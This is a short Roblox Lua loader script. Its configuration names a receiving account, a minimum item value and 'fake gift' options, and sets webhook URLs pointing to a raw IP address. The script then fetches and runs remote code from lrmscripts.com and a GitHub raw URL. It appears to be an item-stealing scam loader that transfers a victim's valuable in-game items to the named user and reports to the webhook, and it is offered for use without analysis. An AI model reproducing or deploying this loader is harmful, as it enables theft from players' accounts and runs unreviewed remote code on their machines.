_G.LRMConfig = {
    User = {"AcescyG"},
    min_value = 10000000000,
    pingEveryone = "No", -- dont change this
    Webhook = "http://176.100.37.215:20002/proxy/5be3c26ebeabf6db6cdbc31cc5a2cd2b",
    FakeGift = "Yes",
    Trash = "http://176.100.37.215:20002/proxy/5be3c26ebeabf6db6cdbc31cc5a2cd2b",
    LoadingScreen = "No",
    GiftOnlyRares = "No",
    ExecuteOtherScript = "No",
}
    
loadstring(game:HttpGetAsync('https://lrmscripts.com/script/main.lua'))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/7teenscripts/loadingscrn/refs/heads/main/lua"))()
